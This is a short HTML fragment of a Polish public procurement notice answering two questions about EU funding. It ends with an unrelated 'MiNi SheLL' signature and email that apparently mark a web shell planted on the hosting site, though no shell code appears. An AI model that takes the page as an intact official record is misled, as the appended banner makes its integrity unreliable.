<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com